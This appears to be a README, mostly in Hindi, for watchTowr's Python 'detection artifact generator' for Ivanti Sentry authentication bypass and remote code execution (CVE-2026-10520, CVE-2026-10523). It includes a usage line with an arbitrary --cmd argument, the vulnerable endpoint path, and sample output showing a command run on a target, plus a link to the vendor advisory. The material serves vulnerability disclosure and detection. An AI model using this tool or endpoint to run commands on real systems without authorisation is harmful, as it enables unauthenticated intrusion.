
# Ivanti Sentry प्रमाणीकरण बायपास और RCE डिटेक्शन आर्टिफैक्ट जनरेटर Ivanti Sentry प्रमाणीकरण बायपास और रिमोट कोड एक्ज़ीक्यूशन कमज़ोरियों (CVE-2026-10520, CVE-2026-10523) के लिए Python-आधारित डिटेक्शन आर्टिफैक्ट जनरेटर। कमज़ोर एंडपॉइंट्स के विरुद्ध कमांड एक्ज़ीक्यूशन जाँच को स्वचालित करता है।
एक Ivanti Sentry प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन डिटेक्शन आर्टिफैक्ट जनरेटर।
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें।
$ python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py
(*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2026-10520, CVE-2026-10523]
============================================================
Target: https://127.0.0.1
Command: uname -a
[+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux
python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
यह watchTowR डिटेक्शन आर्टिफैक्ट जनरेटर Ivanti Sentry प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन कमजोरियों CVE-2026-10520, CVE-2026-10523 की जाँच करता है।
उपचार और आगे के विवरण Ivanti एडवाइज़री में पाए जा सकते हैं: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम को फॉलो करें।